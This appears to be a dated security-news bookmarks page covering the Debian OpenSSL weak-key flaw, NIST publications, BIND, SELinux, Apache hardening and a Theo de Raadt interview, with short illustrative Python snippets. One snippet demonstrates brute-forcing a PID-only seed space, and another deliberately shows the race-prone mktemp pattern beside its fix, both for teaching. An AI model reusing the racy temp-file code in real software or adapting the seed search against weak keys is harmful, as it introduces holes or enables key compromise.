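        blob = base64.b64decode(parts[1])
    except Exception:
        return None
    return hashlib.md5(blob).hexdigest()   # classic OpenSSH fingerprint

with open("weak_fingerprints.txt") as f:   # hypothetical blocklist
    weak = {l.strip() for l in f if l.strip()}

with open("authorized_keys") as f:
    for n, line in enumerate(f, 1):
        fp = fingerprint(line)
        if fp in weak:
            print(f"line {n}: weak key (fingerprint {fp}); remove it")
```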
A full explanation of the problem can be found here. In a nutshell, Debian's OpenSSL maintainers made some Debian-specific patches that, according to subscriber-only content at LWN.net, were aimed at fixing a memory mapping error that surfaced during testing with the valgrind utility. The unintended consequence was a crippling of the randomness of keys, making them predictable, and thus possible to guess using "brute-force" attacks. And unfortunately, the Debian maintainers failed to submit their patches upstream, so the problem did not surface until very recently (there's certainly a lesson to be learned there). Not surprisingly, brute force attacks are way up this week, LWN.net also reported.
Users of Debian and Debian-based distributions such as Ubuntu should immediately upgrade the SSH software on their systems. The new ssh-client package will contain an "ssh-vulnkey" utility that, when run, checks the user's keys for the problem. Users should re-generate any affected keys as soon as possible.
Also possibly affected are "OpenVPN keys, DNSSEC keys, and key material for use in X.509 certificates and session keys used in SSL/TLS connections," though apparently not keys generated with GnuPG or GnuTLS. More details can be found here (Debian resource page), as well as on this webpage, which also links to lists of common keys and brute-force scripts that boast of 20-minute typical break-in times.
[May 16, 2008] Practical Technology: Open-Source Security Idiots
The key-generation mechanism described here is really alarming.
Sometimes, people do such stupid things that words almost fail me. That’s the case with a Debian ‘improvement’ to OpenSSL that rendered this network security program next to useless in Debian, Ubuntu and other related Linux distributions.
OpenSSL is used to enable SSL (Secure Socket Layer) and TLS (Transport Layer Security) in Linux, Unix, Windows and many other operating systems. It also includes a general purpose cryptography library. OpenSSL is used not only in operating systems, but in numerous vital applications such as security for Apache Web servers, OpenVPN for virtual private networks, and in security appliances from companies like Check Point and Cisco.
Get the picture? OpenSSL isn’t just important, it’s vital, in network security. It’s quite possible that you’re running OpenSSL even if you don’t have a single Linux server within a mile of your company. It’s that widely used.
Now, OpenSSL itself is still fine. What’s anything but fine is any Linux, or Linux-powered device, that’s based on Debian Linux OpenSSL code from September 17th, 2006 until May 13, 2008.
What happened? This is where the idiot part comes in. Some so-called Debian developer decided to ‘fix’ OpenSSL because it was causing the Valgrind code analysis tool and IBM’s Rational Purify runtime debugging tool to produce warnings about uninitialized data in any code that was linked to OpenSSL. This ‘problem’ and its fix have been known for years. That didn’t stop our moronic developer from fixing it on his own by removing the code that enabled OpenSSL to generate truly random numbers.
After this ‘fix,’ OpenSSL on Debian systems could only use one of a range from 1 to 32,768—the number of possible Linux process identification numbers—as the ‘random’ number for its PRNG (Pseudo Random Number Generator). For cryptography purposes, a range of numbers like that is a bad joke. Anyone who knows anything about cracking can work up a routine to automatically bust it within a few hours.
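To see why a 15-bit seed space is a bad joke, consider this toy demonstration; Python's random module stands in for OpenSSL's PRNG, so the point is the size of the search space, not the actual Debian key-generation code:

```python
# Toy demonstration of why a PID-only seed is hopeless. Python's
# random module stands in for OpenSSL's PRNG; the point is that
# 32,768 seeds can be searched exhaustively in seconds, not that this
# is the actual Debian key-generation code.
import random

MAX_PID = 32768

def toy_keygen(seed):
    rng = random.Random(seed)
    return rng.getrandbits(128)   # stand-in for generating a key

# A "victim" generates a key seeded only by its process ID.
victim_key = toy_keygen(12345)

# The attacker simply tries every possible PID.
for pid in range(1, MAX_PID + 1):
    if toy_keygen(pid) == victim_key:
        print(f"recovered seed/PID: {pid}")   # -> 12345
        break
```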
Why didn’t the OpenSSL team catch this problem? They didn’t spot it because they didn’t see it. You see, Debian developers have this cute habit of keeping their changes to themselves rather than passing them upstream to any program’s actual maintainers. Essentially, what Debian ends up doing is forking programs. There’s the Debian version and then there’s the real version.
Usually, it’s a difference that makes no difference. Sometimes, it just shows how pig-headed Debian developers can be. My favorite case of this is when they decided that rather than allow Mozilla to have control of the logo in the Firefox browser, because that wasn’t open enough according to the Debian Social Contract, they forked Firefox into their own version: Iceweasel.
That was just stupid. This is stupid and it’s put untold numbers of users at risk for security attacks.
First, the mistake itself was something that only a programming newbie would have made, and I have no idea how it ever got past the Debian code maintainers. This is a first-year programming assignment: “What is a random number generator and how do you make one?”
Then, insult to injury, because Debian never passed its ‘fix’ on to the OpenSSL maintainers, the people who would have caught the problem at a glance, this sloppy, insecure mess has now been used on hundreds of thousands, if not millions, of servers, PCs, and appliances.
This isn’t just bad. This is Microsoft security bad.
Now, there’s a fix for Debian 4.0 Etch and its development builds. Ubuntu, which is based on Debian, also has fixes for it. In Ubuntu, the versions that need patches are Ubuntu 7.04, Feisty; Ubuntu 7.10, Gutsy; the just-released Ubuntu 8.04 LTS, Hardy; and the developer builds of Ubuntu Intrepid Ibex.
Debian has also opened a site on how to roll over your insecure security keys to better ones once you’ve installed the corrected software. For more on how to fix your system, see Fixing Debian OpenSSL on my ComputerWorld blog, Cyber Cynic.
[May 14, 2008] Securing the net: the fruits of incompetence
[May 8, 2008] National Checklist Program Repository
30,814 CVE vulnerabilities; 160 checklists; 141 US-CERT alerts; 2,192 US-CERT vulnerability notes; 3,259 OVAL queries
[May 8, 2008] CWE - Common Weakness Enumeration
[May 8, 2008] http://csrc.nist.gov/publications/PubsDrafts.html#800-123
Reasonably well-written draft with good structure, but uneven coverage of topics (weak for section 6.4.1, vulnerability scanning, where the question of false positives is swept under the carpet). Good list of additional documents on page D2.
Draft SP 800-123, Guide to General Server Security, is available for public comment.
This document is intended to assist organizations in installing, configuring, and maintaining secure servers. SP 800-123 makes recommendations for securing a server's operating system and server software, as well as maintaining the server's secure configuration through application of appropriate patches and upgrades, security testing, log monitoring, and backups of data and operating system files.
The document addresses common servers that use general operating systems and are deployed in both outward-facing and inward-facing locations.
Comments need to be received by June 13, 2008.
[Apr 23, 2008] Semantic Gap
Posted by kdawson on Wednesday April 23, @08:03AM
from the stand-and-identify dept. captcha_fun writes: "Researchers at Penn State have developed a patent-pending image-based CAPTCHA technology for next-generation computer authentication. A user is asked to pass two tests: (1) click the geometric center of an image within a composite image, and (2) annotate an image using a word selected from a list. The images shown to users have fake colors, textures, and edges, based on a sequence of randomly-generated parameters. Computer vision and recognition algorithms, such as alipr, rely on original colors, textures, and shapes in order to interpret the semantic content of an image. Because of the endowed power of imagination, even without the correct color, texture, and shape information, humans can still pass the tests with ease. Until computers can 'imagine' what is missing from an image, robotic programs will be unable to pass these tests. The system is called IMAGINATION and you can try it out."
This sounds promising given how broken current CAPTCHA technology is.
[Dec 28, 2007] http://csrc.nist.gov/publications/PubsSPs.html#800-53_Rev2
December 28, 2007 | NIST
NIST announces the release of Special Publication 800-53, Revision 2, Recommended Security Controls for Federal Information Systems. This special update incorporates guidance on appropriate safeguards and countermeasures for federal industrial control systems.
NIST’s Computer Security Division (Information Technology Laboratory) and Intelligent Systems Division (Manufacturing Engineering Laboratory), in collaboration with the Department of Homeland Security and organizations within the federal government that own, operate, and maintain industrial control systems, developed the necessary industrial control system augmentations and interpretations for the security controls, control enhancements, and supplemental guidance in Special Publication 800-53.
The industrial control system augmentations and interpretations for Special Publication 800-53 will facilitate the employment of appropriate safeguards and countermeasures for these specialized information systems that are part of the critical infrastructure of the United States.
The changes to Special Publication 800-53, Revision 1 in updating to Revision 2, include:
- a new Appendix I, Industrial Control Systems;
- an updated low security control baseline with the addition of security control CP-4, Contingency Plan Testing and Exercises; and
- an updated Appendix A, References Section.
The regular two-year update to Special Publication 800-53 will occur, as previously scheduled, in December 2008.
[Nov 14, 2006] Configuring Java Applications to Use Solaris Security.
[Nov 14, 2006] Draft SP 800-115, Technical Guide to Information Security Testing.
Draft SP 800-115, Technical Guide to Information Security Testing, is available for public comment. It seeks to assist organizations in planning and conducting technical information security testing, analyzing findings, and developing mitigation strategies. The publication provides practical recommendations for designing, implementing, and maintaining technical information security testing processes and procedures. SP 800-115 provides an overview of key elements of security testing, with an emphasis on technical testing techniques, the benefits and limitations of each technique, and recommendations for their use. Draft SP 800-115 is intended to replace SP 800-42, Guideline on Network Security Testing, which was released in 2003. Please visit the drafts page to learn how to submit comments to this draft document.
[Nov 1, 2006] Operational Security Capabilities for IP Network Infrastructure (opsec) Charter
- Framework for Operational Security Capabilities for IP Network Infrastructure (41497 bytes)
- Security Best Practices Efforts and Documents (59589 bytes)
- Operational Security Current Practices (90632 bytes)
- Filtering and Rate Limiting Capabilities for IP Network Infrastructure (44099 bytes)
- Service Provider Infrastructure Security (38329 bytes)
- Routing Control Plane Security Capabilities (40431 bytes)
- Logging Capabilities for IP Network Infrastructure (44543 bytes)
[May 4, 2006] Draft Special Publication 800-80, Guide for Developing Performance Metrics for Information Security
Adobe PDF (762 KB)
NIST's Computer Security Division has completed the initial public draft of Special Publication 800-80, Guide for Developing Performance Metrics for Information Security.
This guide is intended to assist organizations in developing metrics for an information security program. The methodology links information security program performance to agency performance. It leverages agency-level strategic planning processes and uses security controls from NIST SP 800-53, Recommended Security Controls for Federal Information Systems, to characterize security performance. To facilitate the development and implementation of information security performance metrics, the guide provides templates, including at least one candidate metric for each of the security control families described in NIST SP 800-53.
[Aug 15, 2005] Draft NIST Special Publication 800-26 Revision 1, Guide for Information Security Program Assessments and System Reporting Form
Adobe PDF (1,153 KB)
The NIST Computer Security Division is pleased to announce for your review and comment draft NIST Special Publication 800-26 Revision 1, Guide for Information Security Program Assessments and System Reporting Form. This draft document brings the assessment process up to date with key standards and guidelines developed by NIST.
Please provide comments by October 17, 2005 to [email protected]. (The comment period has since closed.)
[Sept 11, 2004] http://secinf.net/unix_security/
A useful list of security papers, tutorials, and FAQs. It looks like it was created in 2002 and never updated since.
Computer Security: Art and Science, by Matt Bishop (University of California, Davis). Addison Wesley, 2003; ISBN 0-201-44099-7; cloth, 1136 pp.; published 12/02/2002; US $74.99.
An expensive and dull book that can be used for torturing CS students :-). Its attempt at broad coverage might well kill any interest in computer security for most students...
eSecurity Planet: Trends: Updated Open Source Security Testing ...
Updated Open Source Security Testing Manual Available, by Paul Desmond. Version 2 of the Open Source Security Testing Methodology Manual (OSSTMM) was posted on ...
The sky is not falling By Dev Zaborav
Recently, notifications started going out about a number of critical vulnerabilities in BIND, the software that powers the majority of the name servers on the Internet. In an attempt to convey the importance of these holes, many computer security experts drew near-panicked comparisons to the massive, widespread BIND attacks of 1998, and some went so far as to proclaim that this incident would be the next great Internet-crippling bug.
To an extent, the concern over the announcement of the BIND vulnerabilities is valid. The Internet works as we know it because when we type a site into our browsers or email clients, name servers translate that site's name into numbers that can be routed. Without functioning name servers, the Internet becomes a much different world. Imagine having to identify friends by their telephone numbers rather than by their names. The vulnerabilities that were released at the end of January could allow attackers to take down or take control of the majority of name servers on the Internet. It was imperative that server administrators be notified as soon as possible and alerted as to the crucial nature of this problem. They were notified promptly.
However, by the time the advisories reached many security experts and members of the press, the discussions had taken on a tone of hysteria. Before the advisory was made public, the root name servers -- those that disseminate name information to the rest of the Internet's name servers -- had already been patched. It remains for system administrators on the rest of the Internet to upgrade their servers ... and many large providers and corporations reacted quickly and appropriately. At this point, the majority of Internet backbone providers have upgraded their servers.
The possibility that these vulnerabilities will take down the entire Internet is an unlikely one at best. To prove how drastic a bug this is, many experts pointed to the 1998 BIND hole, which was indeed one of the most persistently exploited vulnerabilities on the Net for a long, long time. What the experts fail to mention, however, is that at the time, the Red Hat distribution of Linux set up BIND without prompting at installation. Many Linux users didn't know they were running BIND, so they didn't think they needed to apply the patch when it became available. It's no longer the case that Red Hat installs BIND automatically; there will be fewer servers running BIND unnecessarily or unknowingly, so this vulnerability will be less prevalent. Despite their widespread effect, the great BIND attacks of 1998 didn't cause the Internet to shut down. The Internet continued along just fine, except for a few hundred compromised servers and defaced Web pages, which hardly affect the functionality of the Internet as a whole.
Another incident that experts and journalists have used to display how overwhelming this set of vulnerabilities could be occurred in late January when Microsoft's Web pages were unavailable for several hours due to a DNS problem (http://abcnews.go.com/sections/scitech/DailyNews/microsoft010125.html). While it's true that this is an example of a Website being inaccessible due to a problem with name servers, the instance is otherwise unrelated to the BIND problem. Microsoft's name servers don't run BIND, and by all indications the troubles they suffered two weeks ago were in no way similar to those caused by the holes in BIND. The constant comparison, clearly intended to heighten concern about the destruction of the entire Internet if name servers go down, smacks of sensationalism.
developerWorks/Linux Security: Improving the security of open UNIX platforms -- a simple MD5-checking shell script (bash) by Igor Maximov ([email protected]). Nothing special.
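For readers who just want the idea, a rough Python equivalent of such an integrity check might look like the sketch below; the baseline format (md5sum-style "digest  path" lines) is an assumption, not Maximov's actual script:

import hashlib
import sys

def md5_of(path):
    # Hash the file in chunks so large files don't exhaust memory.
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify(baseline_path):
    # Each baseline line holds "<hex digest>  <file path>", the same
    # format the md5sum utility emits.
    with open(baseline_path) as baseline:
        for line in baseline:
            digest, path = line.strip().split(None, 1)
            status = "OK" if md5_of(path) == digest else "MODIFIED"
            print(path, status)

if __name__ == "__main__":
    verify(sys.argv[1])

Keep in mind that a checksum baseline is only as trustworthy as the medium it is stored on; if an intruder can rewrite the baseline, the check proves nothing.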
[Dec 28, 2000] NSA Security-Enhanced Linux
Security-Enhanced Linux has a well-defined architecture (named Flask) for flexible mandatory access controls that has been experimentally validated through several prototype systems (DTMach, DTOS, and Flask). The architecture provides clean separation of policy from enforcement, well-defined policy decision interfaces, flexibility in labeling and access decisions, support for policy changes, and fine-grained controls over the kernel abstractions. Detailed studies of the architecture's ability to support a wide variety of security policies have been performed and are available on the DTOS and Flask web pages, accessible via the Background page (http://www.nsa.gov/selinux/background.html). A published paper about the Flask architecture is also available on the Background page. The architecture and its implementation in Linux are described in detail in the documentation (http://www.nsa.gov/selinux/docs.html).
RSBAC appears to have similar goals to Security-Enhanced Linux. Like Security-Enhanced Linux, it separates policy from enforcement and supports a variety of security policies. RSBAC uses a different architecture (the Generalized Framework for Access Control, or GFAC), although the Flask paper notes that at the highest level of abstraction the Flask architecture is consistent with the GFAC. However, the GFAC does not seem to fully address the issue of policy changes and revocation, as discussed in the Flask paper. RSBAC also differs in the specifics of its policy interfaces and its controls, but a careful evaluation of the significance of these differences has not been performed.
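The "separation of policy from enforcement" idea is easy to miss in the abstract, so here is a toy Python sketch of it; the labels and rule format are invented for illustration and bear no relation to real SELinux policy syntax:

class SecurityServer:
    """Policy side: makes access decisions but never enforces them."""
    def __init__(self, rules):
        # rules maps (subject label, object label) -> set of permissions
        self.rules = rules

    def allowed(self, subject, obj, perm):
        return perm in self.rules.get((subject, obj), set())

class ObjectManager:
    """Enforcement side: consults the security server, then enforces."""
    def __init__(self, security_server):
        self.policy = security_server

    def read_file(self, subject_label, file_label):
        if not self.policy.allowed(subject_label, file_label, "read"):
            raise PermissionError(
                f"{subject_label} may not read {file_label}")
        return "file contents"

# The policy object can be swapped or reloaded without touching the
# enforcement code, which is the point of the Flask design.
policy = SecurityServer({("httpd_t", "web_content_t"): {"read"}})
om = ObjectManager(policy)
print(om.read_file("httpd_t", "web_content_t"))  # allowed
# om.read_file("httpd_t", "shadow_t")            # raises PermissionError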
SecurityPortal - Ask Buffy Apache Security
I am trying to implement security on the Apache Server 1.3.12 running on Red Hat Linux 6.2. Are there any good docs or how-tos on this subject?
Aejaz Sheriff
Very few security problems exist with the Apache server itself. Having said that, however, I suggest that you upgrade to Apache 1.3.14, which solves some security issues. For online documentation of the Apache server the following URLs are excellent:
http://httpd.apache.org/docs/misc/security_tips.html
http://httpd.apache.org/docs/
The majority of Web-based security problems come from poorly written CGI programs, online databases, and the like. Razvan Peteanu has written the following article:
http://securityportal.com/cover/coverstory20001030.html - Best Practices for Secure Web Development
And I highly recommend reading it.
Buffy ([email protected])
Who should own Apache? I have nobody as the owner and the group, but I'm not sure if this is safe or not.
Brad
The usual default for "owning" Apache is user and group root:
-rwxr-xr-x 1 root root 301820 Aug 23 13:45 /usr/sbin/httpd
As for who Apache runs as, this is usually the user and group "nobody" or "apache." In both cases, these accounts are heavily restricted from accessing anything important. From the httpd.conf file:
#
# If you wish httpd to run as a different user or group, you must run
# httpd as root initially and it will switch.
#
# User/Group: The name (or #number) of the user/group to run httpd as.
# . On SCO (ODT 3) use "User nouser" and "Group nogroup".
# . On HPUX you may not be able to use shared memory as nobody, and the
# suggested workaround is to create a user www and use that user.
# NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
# when the value of (unsigned)Group is above 60000;
# don't use Group nobody on these systems!
#
User apache
Group apache
Most Linux distributions now have a special user and group called "apache" for running the Apache Web server. This user is locked out (no password), its home directory is usually the www root, and no command shell is available. This is slightly safer than using "nobody," because the "nobody" account may be shared by other services: if an attacker manages to get the privileges of "nobody" on the system, she may be able to elevate them through some other software. Segregating services under dedicated users like "apache" is a better strategy.
Buffy ([email protected])
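As an aside, the "run httpd as root initially and it will switch" behavior in the config comments above is the classic Unix privilege-drop pattern. Here is a minimal Python sketch of that pattern, not Apache's actual code; it must be started as root, and the "apache" account is assumed to exist:

import grp
import os
import pwd
import socket

# Bind the privileged port (< 1024) while we are still root.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("0.0.0.0", 80))
sock.listen(5)

# Now drop privileges permanently: supplementary groups first, then
# the group, then the user -- after setuid() we could no longer
# change either.
os.setgroups([])
os.setgid(grp.getgrnam("apache").gr_gid)
os.setuid(pwd.getpwnam("apache").pw_uid)

# From here on, a compromise of the server yields only the "apache"
# account, never root.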
Slashdot: Theo de Raadt Responds
Q: Would you and/or other members of the OpenBSD coders consider writing a book on secure, bug-free coding and auditing? Most programming books feature sample code that is written for pedagogical purposes. Quite often this runs contrary to how secure code should be written, leaving a gap in many a programmer's knowledge. A book on auditing and how to avoid security pitfalls when coding would also make your life easier -- less code to audit for OpenBSD, and more time to concentrate on nifty new features!
Theo:
There is perhaps a split between the two issues you bring up. On the one side is secure coding, as in code written to be secure by the original author(s). On the other side is auditing, which is where an outsider (or an insider) later goes and tries to clean up the mess which remains. And there is always a mess. Perhaps part of the problem is that a huge gap lies between these two.
In the end, though, I think that a book on such a topic would probably have to repeat the same thing every second paragraph, throughout the book: Understand the interfaces which you are coding to! Understand the interfaces which you are coding to! Most of the security (or simply bug) issues we audited out of our source tree are just that: the programmer in question was a careless slob, not paying attention to the interface he was using. The repeated nature of the same classes of bugs throughout the source tree also showed us that most programmers learn to code by (bad) examples.
A solid systems approach should not be based on "but it works." Yet, time and time again, we see that for most people this is the case. They don't care about good software, only about "good enough" software. So the programmers can continue to make such mistakes. Thus, I do not feel all that excited about writing a book which would simply teach people that the devil is in the details. If they haven't figured it out by now, perhaps they should consider another occupation (one where they will cause less damage).
OpenBSD has a well deserved reputation for security "out of the box" and for the fact the inbuilt tools are as secure as they're ever likely to be. However, the Ports system is, perhaps, an example of where the secure approach currently has limitations - an installation of OpenBSD running popular third-party systems like INN can only be so secure because the auditing of INN, and other such software, is outside the scope of the BSD audit.
My question is, has the OpenBSD team ever proposed looking into how to create a 'secured ports' tree, or some other similar system, that would ensure that many of the applications people specifically want secure platforms like OpenBSD to run could be as trusted as the platforms themselves?
Theo:
We have our hands already pretty full, just researching new ideas in our main source tree, which is roughly 300MB in size. We also lightly involved ourselves in working with the XFree86 people a while back for some components there. Auditing the components outside of this becomes rather unwieldy. The difficulty lies not only in the volume of such code, but also in other issues. Sometimes communication with the maintainers of these other packages is difficult, for various reasons. Sometimes they are immediately turned off because we don't use the word Linux. Some of these portable software packages are by their nature never really going to approach the quality of regular system software, because they are so bulky.
But most importantly, please remember that we are also human beings, trying to live our lives in a pleasant way, and we don't usually get all that excited about suddenly burning 800 hours on some disgusting piece of badly programmed trash which we can just avoid running. I suppose that quite often some of our auditors look at a piece of code, go "oh, wow, this is really bad," and then just avoid using it. I know that doesn't make you guys feel better, but what can we say...
With the release of SGI's B1 code, and the attempts by many U*ixen to secure their contents via capabilities, ACLs, etc., ad nauseam, how is OpenBSD approaching the issue of resource control?
... ...
Theo:
On the first question, I think there is great confusion in the land of Orange Book. Many people think that it is about security. It is not. Largely, those standards are about accountability in the face of threat, which really isn't about making systems secure; it's about knowing when your system's security breaks down. Not quite the same thing. Please count the commercially deployed C, B, or even A systems which are actually being used by real people for real work before foaming at the mouth about it all being "so great." On the other hand, I think we will see whether some parts of that picture actually start to show up in real systems over time. By the way, I am surprised to see you list ACLs, which don't really have anything to do with B1 systems.
Did the drive to audit code come from need, or from the design of BSD? Or was it initially a whim? More importantly, where did you learn it from? Is there some "mentor" you looked to for rigid design? I have to admire your team's daunting code reviewing... I wonder if I'll ever have that kind of meticulous coding nature.
Theo:
The auditing process developed out of a desire to improve the quality of our operating system. Once we started on it, it became fascinating, fun, and very nearly fanatical. About ten people worked together on it, basically teaching ourselves as things went along. We searched for basic source-code programmer mistakes and sloppiness, rather than "holes" or "bugs." We just kept recursing through the source tree every time we found a sloppiness. Every time we found a mistake a programmer made (such as using mktemp(3) in such a way that a filesystem race occurred), we would go throughout the source tree and fix ALL of them. Then, when we had fixed that one, we would find some other basic mistake, and fix ALL of those. Yes, it's a lot of work. But it has a serious payback. Can you imagine if a Boeing engineer didn't fix ALL of the occurrences of a wiring flaw? Why not at least try to engineer software in the same way?
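The mktemp(3) race Theo mentions is worth making concrete. Python exposes the same pair of interfaces, so here is a minimal sketch of the bug and its fix (illustrative, not OpenBSD's audited code):

import tempfile

# RACY: mktemp() only picks a name that does not exist *yet*. Between
# this call and our open(), an attacker can create a file or symlink
# at that exact path, redirecting our write wherever they like.
path = tempfile.mktemp()
with open(path, "w") as f:
    f.write("secret data")

# SAFE: mkstemp() atomically creates and opens the file (mode 0600),
# so there is no window between choosing the name and owning the file.
fd, path = tempfile.mkstemp()
with open(fd, "w") as f:
    f.write("secret data")

The C-level fix was the same idea: replace mktemp(3) with mkstemp(3) so that name selection and file creation happen in one atomic step.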